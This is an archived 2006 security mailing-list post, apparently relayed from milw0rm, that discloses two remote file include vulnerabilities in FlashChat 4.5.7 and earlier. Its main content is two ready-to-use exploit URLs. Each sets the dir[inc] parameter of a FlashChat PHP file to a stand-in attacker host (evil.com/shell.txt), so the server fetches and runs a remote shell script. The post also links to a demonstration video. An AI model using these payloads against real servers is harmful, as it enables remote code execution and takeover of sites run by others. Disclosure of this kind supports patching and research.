|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
FlashChat <= 4.5.7 Remote File Include Vulnerability
mc.nadz
gmail.com
Date: Mon Sep 04 2006 - 10:57:19 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
NeXtMaN <mc.nadz [at] gmail.com>
Here are 2 RFI vulnerabilities in Flashchat i've found:
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
video here:
Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html
# milw0rm.com [2006-09-04]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]